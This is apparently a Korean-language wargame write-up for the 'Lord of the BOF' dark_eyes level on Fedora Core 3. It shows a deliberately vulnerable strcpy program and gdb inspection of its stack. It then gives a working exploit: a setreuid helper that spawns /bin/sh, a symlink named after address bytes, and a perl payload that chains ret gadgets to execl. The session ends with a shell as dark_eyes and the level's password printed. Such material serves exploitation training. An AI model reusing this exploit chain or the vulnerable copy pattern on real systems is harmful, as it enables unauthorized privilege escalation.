[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_eyes
- Local BOF on Fedora Core 3
- hint : RET sleding
*/
/*
 * Challenge binary: copies argv[1] into a fixed 256-byte stack buffer with an
 * unbounded strcpy(), then writes back the 4 bytes that sat at buffer+264
 * before the copy. No return statement; under C99 falling off the end of
 * main() yields 0.
 *
 * NOTE(review): the file has no #include lines at all — printf, exit, memcpy
 * and strcpy are reached through implicit declarations (<stdio.h>, <stdlib.h>,
 * <string.h>). Left as-is because this listing is the challenge as shipped;
 * production code needs the headers.
 */
int main(int argc, char *argv[])
{
char buffer[256];
// Holds the 4 bytes read from buffer+264, i.e. 8 bytes past the end of the
// 256-byte array. That read is out of bounds (undefined behaviour in standard
// C); in this particular build the disassembly places buffer at [ebp-264],
// so buffer+264 is the frame pointer pushed by main's prologue.
char saved_sfp[4];
if(argc < 2){
printf("argv error\n");
exit(0);
}
// save sfp: snapshot the saved frame pointer before the copy
memcpy(saved_sfp, buffer+264, 4);
// overflow!!  Unbounded copy from a command-line argument into a 256-byte
// buffer: any argv[1] of 256 bytes or more writes past the array over the
// rest of the frame. A bounded copy such as
//   snprintf(buffer, sizeof buffer, "%s", argv[1]);
// would prevent this.
strcpy(buffer, argv[1]);
// restore sfp: undoes only the 4 bytes at buffer+264. Anything the copy
// placed beyond them (the saved return address sits just above the frame
// pointer) is left as written, so this guard blocks frame-pointer tampering
// only; it does not stop the overflow from reaching the return address.
memcpy(buffer+264, saved_sfp, 4);
printf("%s\n", buffer);
}
소스를 보면, 이전 문제에서 단순히 sfp 변조를 막는 기법이 추가된 코드이다.
이는 febp를 막기 위한 것으로서,
이를 보면 이전의 RET sleding을 그대로 사용하면 될 것 같다.
[iron_golem@Fedora_1stFloor ~]$ cp dark_eyes dark_eye1
[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048411
(gdb) r
Starting program: /home/iron_golem/dark_eye1
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x08048411 in main ()
(gdb) x/40x $ebp
0xfefaf2f8: 0xfefaf358 0x00730e33 0x00000001 0xfefaf384
0xfefaf308: 0xfefaf38c 0x0070eab6 0x0083eff4 0x00000000
0xfefaf318: 0xfefaf310 0xfefaf358 0xfefaf300 0x00730df5
0xfefaf328: 0x00000000 0x00000000 0x00000000 0x00718fb4
0xfefaf338: 0x00000001 0x08048360 0x00000000 0x0070e9f0
0xfefaf348: 0x0070f340 0x00718fb4 0x00000001 0x08048360
0xfefaf358: 0x00000000 0x08048381 0x08048408 0x00000001
0xfefaf368: 0xfefaf384 0x080484bc 0x08048510 0x0070f340
0xfefaf378: 0xfefaf37c 0x00715e31 0x00000001 0xfefd7bfe
0xfefaf388: 0x00000000 0xfefd7c19 0xfefd7c32 0xfefd7c3d
(gdb) x/x 0x83eff4
0x83eff4 <svcauthsw+712>: 0x0083ed3c
(gdb) quit
The program is running. Exit anyway? (y or n) y
[iron_golem@Fedora_1stFloor ~]$ cat > sh.c
#include <stdio.h>
#include <stdlib.h>
/*
 * Helper used by the session above: spawn an interactive shell that keeps the
 * effective user/group id of the process running this binary.
 *
 * NOTE(review): setreuid/geteuid/setregid/getegid are declared in <unistd.h>,
 * which this file does not include — they are reached through implicit
 * declarations. None of the return values are checked, so a failed id change
 * still falls through to system().
 */
int main()
{
// Set the real uid/gid equal to the effective ones. Shells commonly give up
// an effective id that differs from the real one; making them equal keeps
// the spawned shell at the effective id.
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
// Runs "/bin/sh" through the C library's command interpreter (the session
// shows the resulting "sh-3.00$" prompt). No return statement: C99 treats
// reaching the end of main() as returning 0.
system("/bin/sh");
}
[iron_golem@Fedora_1stFloor ~]$ gcc -o sh sh.c
[iron_golem@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83\x00"'`
[iron_golem@Fedora_1stFloor ~]$ export PATH=./:$PATH
[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: sub esp,0x118
0x08048411 <main+9>: and esp,0xfffffff0
0x08048414 <main+12>: mov eax,0x0
0x08048419 <main+17>: add eax,0xf
0x0804841c <main+20>: add eax,0xf
0x0804841f <main+23>: shr eax,0x4
0x08048422 <main+26>: shl eax,0x4
0x08048425 <main+29>: sub esp,eax
0x08048427 <main+31>: cmp DWORD PTR [ebp+8],0x1
0x0804842b <main+35>: jg 0x8048447 <main+63>
0x0804842d <main+37>: sub esp,0xc
0x08048430 <main+40>: push 0x804859c
0x08048435 <main+45>: call 0x8048320 <_init+56>
0x0804843a <main+50>: add esp,0x10
0x0804843d <main+53>: sub esp,0xc
0x08048440 <main+56>: push 0x0
0x08048442 <main+58>: call 0x8048340 <_init+88>
0x08048447 <main+63>: sub esp,0x4
0x0804844a <main+66>: push 0x4
0x0804844c <main+68>: lea eax,[ebp-264]
0x08048452 <main+74>: add eax,0x108
0x08048457 <main+79>: push eax
0x08048458 <main+80>: lea eax,[ebp-268]
0x0804845e <main+86>: push eax
0x0804845f <main+87>: call 0x8048330 <_init+72>
0x08048464 <main+92>: add esp,0x10
0x08048467 <main+95>: sub esp,0x8
0x0804846a <main+98>: mov eax,DWORD PTR [ebp+12]
0x0804846d <main+101>: add eax,0x4
0x08048470 <main+104>: push DWORD PTR [eax]
0x08048472 <main+106>: lea eax,[ebp-264]
---Type <return> to continue, or q <return> to quit---
0x08048478 <main+112>: push eax
0x08048479 <main+113>: call 0x8048350 <_init+104>
0x0804847e <main+118>: add esp,0x10
0x08048481 <main+121>: sub esp,0x4
0x08048484 <main+124>: push 0x4
0x08048486 <main+126>: lea eax,[ebp-268]
0x0804848c <main+132>: push eax
0x0804848d <main+133>: lea eax,[ebp-264]
0x08048493 <main+139>: add eax,0x108
0x08048498 <main+144>: push eax
0x08048499 <main+145>: call 0x8048330 <_init+72>
0x0804849e <main+150>: add esp,0x10
0x080484a1 <main+153>: sub esp,0x8
0x080484a4 <main+156>: lea eax,[ebp-264]
0x080484aa <main+162>: push eax
0x080484ab <main+163>: push 0x80485a8
0x080484b0 <main+168>: call 0x8048320 <_init+56>
0x080484b5 <main+173>: add esp,0x10
0x080484b8 <main+176>: leave
0x080484b9 <main+177>: ret //ret 주소 확인
0x080484ba <main+178>: nop
0x080484bb <main+179>: nop
End of assembler dump.
(gdb) quit
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(Jðþ¹¹¹Tz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 502
because of you